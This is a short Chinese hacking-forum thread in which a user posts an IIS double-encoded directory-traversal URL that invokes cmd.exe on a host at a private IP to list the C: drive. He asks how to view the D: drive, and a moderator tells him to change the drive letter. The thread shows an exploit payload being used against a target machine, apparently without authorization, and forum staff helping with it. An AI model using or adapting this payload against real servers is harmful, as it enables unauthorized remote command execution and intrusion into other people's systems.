|
作者: ttt [tsztyc] 论坛用户 | 登录 |
我扫描到如下的IIS漏洞,
http://172.21.5.75/scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\ 这时我能看到他的D盘内容吗??? |
地主 发表时间: 08/21 12:11 |
回复: BearKing [bking] 版主 | 登录 |
把 c:\ 换成 d:\ |
B1层 发表时间: 08/21 12:23 |
回复: ttt [tsztyc] 论坛用户 | 登录 |
我应该换哪里的c为d??? 是最后一个还是后两个???? |
B2层 发表时间: 08/21 15:55 |
回复: ttt [tsztyc] 论坛用户 | 登录 |
我试了多次,还是不行, 到底是哪里错了??? |
B3层 发表时间: 08/21 16:51 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号